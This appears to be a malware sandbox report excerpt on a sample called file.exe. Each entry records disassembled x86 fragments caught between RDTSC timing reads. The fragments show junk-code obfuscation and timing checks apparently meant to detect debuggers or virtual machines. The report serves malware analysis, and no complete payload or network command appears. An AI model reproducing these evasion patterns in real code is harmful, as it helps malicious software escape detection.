Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A30BD0 second address: 4A30BD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A30BD6 second address: 4A30BEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edx 0x00000005 mov edx, ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ax, dx 0x00000012 push ebx 0x00000013 pop esi 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A30DAB second address: 4A30DB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A30DB1 second address: 4A30DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A30DB5 second address: 4A30DB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A30DB9 second address: 4A30E09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FFAACBEF8CCh 0x00000011 jmp 00007FFAACBEF8D5h 0x00000016 popfd 0x00000017 push eax 0x00000018 push edx 0x00000019 pushfd 0x0000001a jmp 00007FFAACBEF8CEh 0x0000001f sbb cx, 4148h 0x00000024 jmp 00007FFAACBEF8CBh 0x00000029 popfd 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A600C2 second address: 4A60158 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FFAAD0A8F1Eh 0x00000012 xor ecx, 489471A8h 0x00000018 jmp 00007FFAAD0A8F1Bh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007FFAAD0A8F28h 0x00000024 adc cx, E408h 0x00000029 jmp 00007FFAAD0A8F1Bh 0x0000002e popfd 0x0000002f popad 0x00000030 je 00007FFB1F57C75Bh 0x00000036 jmp 00007FFAAD0A8F26h 0x0000003b mov ecx, eax 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007FFAAD0A8F27h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A60158 second address: 4A601CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor eax, dword ptr [ebp+08h] 0x0000000c jmp 00007FFAACBEF8D7h 0x00000011 and ecx, 1Fh 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FFAACBEF8D4h 0x0000001b sub ax, 8D88h 0x00000020 jmp 00007FFAACBEF8CBh 0x00000025 popfd 0x00000026 push ecx 0x00000027 push ebx 0x00000028 pop ecx 0x00000029 pop edi 0x0000002a popad 0x0000002b ror eax, cl 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 mov dx, 11CEh 0x00000034 mov ebx, 20D17CDAh 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A601CD second address: 4A601E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A601E8 second address: 4A601EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A601EC second address: 4A601F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A601F0 second address: 4A601F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A601F6 second address: 4A60255 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edi 0x00000005 push eax 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a retn 0004h 0x0000000d nop 0x0000000e mov esi, eax 0x00000010 lea eax, dword ptr [ebp-08h] 0x00000013 xor esi, dword ptr [00DC2014h] 0x00000019 push eax 0x0000001a push eax 0x0000001b push eax 0x0000001c lea eax, dword ptr [ebp-10h] 0x0000001f push eax 0x00000020 call 00007FFAB0D89129h 0x00000025 push FFFFFFFEh 0x00000027 pushad 0x00000028 push ecx 0x00000029 movsx ebx, ax 0x0000002c pop ecx 0x0000002d mov ebx, 23F97E42h 0x00000032 popad 0x00000033 pop eax 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 call 00007FFAAD0A8F22h 0x0000003c pop eax 0x0000003d pushfd 0x0000003e jmp 00007FFAAD0A8F1Bh 0x00000043 and esi, 2C2E19EEh 0x00000049 jmp 00007FFAAD0A8F29h 0x0000004e popfd 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A60255 second address: 4A60265 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAACBEF8CCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A60265 second address: 4A60269 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A60269 second address: 4A602E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ret 0x00000009 nop 0x0000000a push eax 0x0000000b call 00007FFAB08CFB41h 0x00000010 mov edi, edi 0x00000012 jmp 00007FFAACBEF8D7h 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 jmp 00007FFAACBEF8D4h 0x0000001e push ecx 0x0000001f pop eax 0x00000020 popad 0x00000021 push eax 0x00000022 pushad 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007FFAACBEF8D2h 0x0000002a adc al, 00000058h 0x0000002d jmp 00007FFAACBEF8CBh 0x00000032 popfd 0x00000033 popad 0x00000034 popad 0x00000035 xchg eax, ebp 0x00000036 jmp 00007FFAACBEF8D2h 0x0000003b mov ebp, esp 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A602E6 second address: 4A602EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A602EA second address: 4A60307 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A60307 second address: 4A6037C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FFAAD0A8F23h 0x00000013 sbb eax, 0C09678Eh 0x00000019 jmp 00007FFAAD0A8F29h 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007FFAAD0A8F20h 0x00000025 jmp 00007FFAAD0A8F25h 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10008 second address: 4A1000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A1000C second address: 4A10012 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10012 second address: 4A10018 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10018 second address: 4A1001C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A1001C second address: 4A1003E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FFAACBEF8D7h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A1003E second address: 4A10074 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FFAAD0A8F1Ch 0x0000000e xchg eax, ebp 0x0000000f jmp 00007FFAAD0A8F20h 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FFAAD0A8F1Ah 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10074 second address: 4A1007A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A1007A second address: 4A10080 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10080 second address: 4A10084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10084 second address: 4A10138 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and esp, FFFFFFF8h 0x0000000b pushad 0x0000000c movzx eax, dx 0x0000000f call 00007FFAAD0A8F27h 0x00000014 mov ah, 34h 0x00000016 pop edx 0x00000017 popad 0x00000018 xchg eax, ecx 0x00000019 pushad 0x0000001a mov dh, al 0x0000001c popad 0x0000001d push eax 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FFAAD0A8F25h 0x00000025 and cl, 00000016h 0x00000028 jmp 00007FFAAD0A8F21h 0x0000002d popfd 0x0000002e movzx esi, di 0x00000031 popad 0x00000032 xchg eax, ecx 0x00000033 jmp 00007FFAAD0A8F23h 0x00000038 xchg eax, ebx 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007FFAAD0A8F24h 0x00000040 sub esi, 5C6E3F98h 0x00000046 jmp 00007FFAAD0A8F1Bh 0x0000004b popfd 0x0000004c mov bx, ax 0x0000004f popad 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007FFAAD0A8F20h 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10138 second address: 4A10157 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFAACBEF8D1h 0x00000008 mov edx, ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10157 second address: 4A10161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, 3DB94458h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10161 second address: 4A101B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+10h] 0x0000000c jmp 00007FFAACBEF8D0h 0x00000011 xchg eax, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FFAACBEF8CDh 0x0000001b xor ecx, 18BAE2A6h 0x00000021 jmp 00007FFAACBEF8D1h 0x00000026 popfd 0x00000027 mov di, ax 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A101B4 second address: 4A10258 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FFAAD0A8F27h 0x00000010 pushfd 0x00000011 jmp 00007FFAAD0A8F28h 0x00000016 jmp 00007FFAAD0A8F25h 0x0000001b popfd 0x0000001c popad 0x0000001d xchg eax, esi 0x0000001e pushad 0x0000001f push eax 0x00000020 call 00007FFAAD0A8F23h 0x00000025 pop eax 0x00000026 pop edx 0x00000027 mov eax, 0B254805h 0x0000002c popad 0x0000002d mov esi, dword ptr [ebp+08h] 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007FFAAD0A8F1Eh 0x00000037 sub al, FFFFFF98h 0x0000003a jmp 00007FFAAD0A8F1Bh 0x0000003f popfd 0x00000040 mov dl, al 0x00000042 popad 0x00000043 push ecx 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10258 second address: 4A1025C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A1025C second address: 4A10279 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10279 second address: 4A10282 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 4F72h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10282 second address: 4A1033A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], edi 0x0000000a jmp 00007FFAAD0A8F1Fh 0x0000000f test esi, esi 0x00000011 pushad 0x00000012 mov ecx, 78C0D22Bh 0x00000017 mov eax, 6A786607h 0x0000001c popad 0x0000001d je 00007FFB1F5C7282h 0x00000023 jmp 00007FFAAD0A8F1Ah 0x00000028 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000002f jmp 00007FFAAD0A8F20h 0x00000034 je 00007FFB1F5C7271h 0x0000003a pushad 0x0000003b push esi 0x0000003c mov dx, 2D00h 0x00000040 pop edx 0x00000041 pushad 0x00000042 mov edi, ecx 0x00000044 pushfd 0x00000045 jmp 00007FFAAD0A8F20h 0x0000004a jmp 00007FFAAD0A8F25h 0x0000004f popfd 0x00000050 popad 0x00000051 popad 0x00000052 mov edx, dword ptr [esi+44h] 0x00000055 jmp 00007FFAAD0A8F1Eh 0x0000005a or edx, dword ptr [ebp+0Ch] 0x0000005d pushad 0x0000005e mov eax, 35C047FDh 0x00000063 jmp 00007FFAAD0A8F1Ah 0x00000068 popad 0x00000069 test edx, 61000000h 0x0000006f push eax 0x00000070 push edx 0x00000071 push eax 0x00000072 push edx 0x00000073 pushad 0x00000074 popad 0x00000075 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A1033A second address: 4A10357 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10357 second address: 4A1036C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 mov di, cx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007FFB1F5C723Bh 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A1036C second address: 4A103DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FFAACBEF8D8h 0x0000000a or ax, 64C8h 0x0000000f jmp 00007FFAACBEF8CBh 0x00000014 popfd 0x00000015 popad 0x00000016 test byte ptr [esi+48h], 00000001h 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov cx, bx 0x00000020 pushfd 0x00000021 jmp 00007FFAACBEF8D7h 0x00000026 sbb cx, DBBEh 0x0000002b jmp 00007FFAACBEF8D9h 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A103DD second address: 4A103ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAAD0A8F1Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A103ED second address: 4A103F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00862 second address: 4A00866 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00866 second address: 4A00914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], ebp 0x0000000a pushad 0x0000000b mov bx, cx 0x0000000e pushfd 0x0000000f jmp 00007FFAACBEF8D6h 0x00000014 adc eax, 248C1FC8h 0x0000001a jmp 00007FFAACBEF8CBh 0x0000001f popfd 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 jmp 00007FFAACBEF8D6h 0x00000028 and esp, FFFFFFF8h 0x0000002b pushad 0x0000002c call 00007FFAACBEF8CEh 0x00000031 pushfd 0x00000032 jmp 00007FFAACBEF8D2h 0x00000037 add ecx, 66CAD488h 0x0000003d jmp 00007FFAACBEF8CBh 0x00000042 popfd 0x00000043 pop eax 0x00000044 mov bh, F2h 0x00000046 popad 0x00000047 xchg eax, ebx 0x00000048 jmp 00007FFAACBEF8D0h 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007FFAACBEF8CDh 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00914 second address: 4A00929 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00929 second address: 4A0094E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFAACBEF8CDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0094E second address: 4A00997 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, dh 0x00000005 pushfd 0x00000006 jmp 00007FFAAD0A8F28h 0x0000000b xor eax, 54707E08h 0x00000011 jmp 00007FFAAD0A8F1Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, esi 0x0000001b pushad 0x0000001c movzx esi, di 0x0000001f push ebx 0x00000020 mov al, E9h 0x00000022 pop ebx 0x00000023 popad 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push esi 0x00000029 pop ebx 0x0000002a mov eax, 11E93D03h 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00997 second address: 4A00A19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 mov al, dl 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FFAACBEF8D8h 0x00000012 or eax, 1F311DF8h 0x00000018 jmp 00007FFAACBEF8CBh 0x0000001d popfd 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FFAACBEF8D6h 0x00000025 xor esi, 7CD2F858h 0x0000002b jmp 00007FFAACBEF8CBh 0x00000030 popfd 0x00000031 push eax 0x00000032 pop edi 0x00000033 popad 0x00000034 popad 0x00000035 mov esi, dword ptr [ebp+08h] 0x00000038 jmp 00007FFAACBEF8D2h 0x0000003d sub ebx, ebx 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00A19 second address: 4A00A1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00A1D second address: 4A00A21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00A21 second address: 4A00A27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00A27 second address: 4A00A77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFAACBEF8CBh 0x00000008 pushfd 0x00000009 jmp 00007FFAACBEF8D8h 0x0000000e sbb ecx, 4B0D9C48h 0x00000014 jmp 00007FFAACBEF8CBh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d test esi, esi 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 call 00007FFAACBEF8CBh 0x00000027 pop esi 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00A77 second address: 4A00A86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAAD0A8F1Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00A86 second address: 4A00AC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FFB1F1151AFh 0x00000011 jmp 00007FFAACBEF8CEh 0x00000016 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 mov al, 48h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00AC5 second address: 4A00B4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov ecx, esi 0x0000000c pushad 0x0000000d jmp 00007FFAAD0A8F23h 0x00000012 mov bh, cl 0x00000014 popad 0x00000015 je 00007FFB1F5CE7BDh 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FFAAD0A8F21h 0x00000022 sub eax, 61263EE6h 0x00000028 jmp 00007FFAAD0A8F21h 0x0000002d popfd 0x0000002e mov bl, ah 0x00000030 popad 0x00000031 test byte ptr [76FB6968h], 00000002h 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FFAAD0A8F26h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00B4F second address: 4A00BFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007FFB1F115123h 0x00000010 jmp 00007FFAACBEF8D9h 0x00000015 mov edx, dword ptr [ebp+0Ch] 0x00000018 jmp 00007FFAACBEF8CEh 0x0000001d xchg eax, ebx 0x0000001e pushad 0x0000001f movsx edx, ax 0x00000022 popad 0x00000023 push eax 0x00000024 jmp 00007FFAACBEF8CFh 0x00000029 xchg eax, ebx 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007FFAACBEF8D4h 0x00000031 add ecx, 03B6D4D8h 0x00000037 jmp 00007FFAACBEF8CBh 0x0000003c popfd 0x0000003d pushfd 0x0000003e jmp 00007FFAACBEF8D8h 0x00000043 sub cx, 9F38h 0x00000048 jmp 00007FFAACBEF8CBh 0x0000004d popfd 0x0000004e popad 0x0000004f xchg eax, ebx 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 push edi 0x00000054 pop ecx 0x00000055 mov dx, EFB2h 0x00000059 popad 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00BFE second address: 4A00C04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00C04 second address: 4A00C08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00C08 second address: 4A00C3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov bh, cl 0x0000000e pushfd 0x0000000f jmp 00007FFAAD0A8F1Fh 0x00000014 jmp 00007FFAAD0A8F23h 0x00000019 popfd 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00C3B second address: 4A00C6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FFAACBEF8CEh 0x0000000f push dword ptr [ebp+14h] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00C6F second address: 4A00C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, 4F79651Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00D33 second address: 4A00D39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00D39 second address: 4A00D3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
